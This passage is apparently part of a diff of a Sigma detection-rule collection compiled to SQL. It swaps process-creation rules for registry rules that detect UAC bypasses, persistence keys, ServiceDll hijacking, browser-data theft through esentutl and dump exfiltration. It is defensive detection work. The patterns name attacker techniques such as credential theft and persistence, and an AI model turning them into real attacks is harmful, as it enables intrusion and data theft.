CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], "falsepositives": [ - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of the dll." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' 